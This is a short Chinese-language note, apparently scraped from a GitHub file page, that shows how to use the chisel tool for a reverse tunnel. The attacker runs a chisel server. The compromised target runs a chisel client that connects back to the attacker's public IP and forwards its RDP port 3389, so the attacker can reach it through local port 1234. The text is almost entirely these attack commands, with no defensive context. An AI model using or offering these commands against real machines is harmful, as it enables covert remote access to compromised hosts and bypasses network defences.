Skip to content

Latest commit

 

History

History
11 lines (9 loc) · 498 Bytes

File metadata and controls

11 lines (9 loc) · 498 Bytes
https://github.com/jpillora/chisel
攻击机执行
>chisel server -p 12138 –reverse

image

靶机执行
>chisel client 公网攻击机IP:12138 R:1234:127.0.0.1:3389

image

建立成功后,攻击机连接本机1234端口即可访问靶机3389

image